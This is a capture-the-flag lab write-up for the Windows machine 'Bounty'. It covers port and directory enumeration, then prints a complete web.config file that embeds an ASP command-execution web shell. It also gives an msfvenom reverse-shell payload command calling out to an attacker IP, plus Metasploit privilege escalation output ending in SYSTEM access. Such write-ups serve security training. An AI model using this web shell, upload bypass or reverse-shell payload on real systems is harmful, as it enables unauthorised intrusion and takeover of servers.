Bounty
OS: Windows, Difficulty: Easy, IP: 10.10.10.93
Initial Enumeration
# Nmap 7.70 scan initiated Thu Jul 18 22:03:22 2019 as: nmap --max-rate 1000 --min-parallelism 1000 -p- -T5 -oN T-all 10.10.10.93
Nmap scan report for 10.10.10.93
Host is up (0.22s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE
80/tcp open http
# Nmap done at Thu Jul 18 22:05:34 2019 -- 1 IP address (1 host up) scanned in 131.98 seconds

gobuster dir -k -t 200 -w /usr/share/wordlists/dirb/big.txt -o dirb-big -u http://10.10.10.93 -x asp,aspx
/aspnet_client (Status: 301)
/transfer.aspx (Status: 200)
/uploadedfiles (Status: 301)

Using the following links I was able to get to a working web-shell
web.config code
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
</configuration>
<---- ASP CODE ---->
<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
Function getCommandOutput(theCommand)
Dim objShell, objCmdExec
Set objShell = CreateObject("WScript.Shell")
Set objCmdExec = objshell.exec(thecommand)
getCommandOutput = objCmdExec.StdOut.ReadAll
end Function
%>
<HTML>
<BODY>
<FORM action="" method="GET">
<input type="text" name="cmd" size=45 value="<%= szCMD %>">
<input type="submit" value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<%Response.Write(Request.ServerVariables("server_name"))%>
<p>
<b>The server's port:</b>
<%Response.Write(Request.ServerVariables("server_port"))%>
</p>
<p>
<b>The server's software:</b>
<%Response.Write(Request.ServerVariables("server_software"))%>
</p>
<p>
<b>The server's software:</b>
<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
<% szCMD = request("cmd")
thisDir = getCommandOutput("cmd /c" & szCMD)
Response.Write(thisDir)%>
</p>
<br>
</BODY>
</HTML>

Now I created a payload to get meterpreter session and uploaded it as shell.exe.config
which is allowed by the server and using the web-shell I had, I renamed the file to shell.exe
and then ran it.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.7 LPORT=1337 -f exe > shell.exe.config
NOTE: I was not able to find the user.txt
flag at first so I just jumped ahead and went for root, however, I had to make the hidden files visible to get the user.txt
file, which I realised way too late.
The shell was a x86 shell so I had to upgrade to x64 shell and then run exploit suggester.
msf5 exploit(windows/local/payload_inject) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set SESSION 2
msf5 post(multi/recon/local_exploit_suggester) > exploit
[*] 10.10.10.93 - Collecting local exploits for x64/windows...
[*] 10.10.10.93 - 11 exploit checks are being tried...
[+] 10.10.10.93 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.93 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable.
[+] 10.10.10.93 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.93 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[*] Post module execution completed
msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_092_schelevator
msf5 exploit(windows/local/ms10_092_schelevator) > exploit
[*] Started reverse TCP handler on 10.10.14.7:4444
[*] Preparing payload at C:\Windows\TEMP\CtBYgVrpsKo.exe
[*] Creating task: APiB17mL
[*] SUCCESS: The scheduled task "APiB17mL" has successfully been created.
[*] SCHELEVATOR
[*] Reading the task file contents from C:\Windows\system32\tasks\APiB17mL...
[*] Original CRC32: 0xd0da0fc9
[*] Final CRC32: 0xd0da0fc9
[*] Writing our modified content back...
[*] Validating task: APiB17mL
[*]
[*] Folder: \
[*] TaskName Next Run Time Status
[*] ======================================== ====================== ===============
[*] APiB17mL 8/1/2019 8:35:00 PM Ready
[*] SCHELEVATOR
[*] Disabling the task...
[*] SUCCESS: The parameters of scheduled task "APiB17mL" have been changed.
[*] SCHELEVATOR
[*] Enabling the task...
[*] SUCCESS: The parameters of scheduled task "APiB17mL" have been changed.
[*] SCHELEVATOR
[*] Executing the task...
[*] Sending stage (179779 bytes) to 10.10.10.93
[*] SUCCESS: Attempted to run the scheduled task "APiB17mL".
[*] SCHELEVATOR
[*] Deleting the task...
[*] SUCCESS: The scheduled task "APiB17mL" was successfully deleted.
[*] SCHELEVATOR
[*] Meterpreter session 3 opened (10.10.14.7:4444 -> 10.10.10.93:49159) at 2019-07-18 23:12:11 +0530
This got me a NT Authority/System
Shell
User Own
C:\Users\merlin\Desktop>attrib *.* -h -s /s /d
C:\Users\merlin\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 5084-30B0
Directory of C:\Users\merlin\Desktop
05/31/2018 12:17 AM <DIR> .
05/31/2018 12:17 AM <DIR> ..
05/30/2018 12:22 AM 282 desktop.ini
05/30/2018 11:32 PM 32 user.txt
2 File(s) 314 bytes
2 Dir(s) 11,854,745,600 bytes free
C:\Users\merlin\Desktop>type user.txt
e29ad***
Root Own
C:\Users\Administrator\Desktop>type root.txt
c837f***
Learning Outcome
Enumerate the web directories and file extensions a little better. Always open up the hidden files on the system as soon as you get a shell to make sure you do not miss anything important.
Last updated
Was this helpful?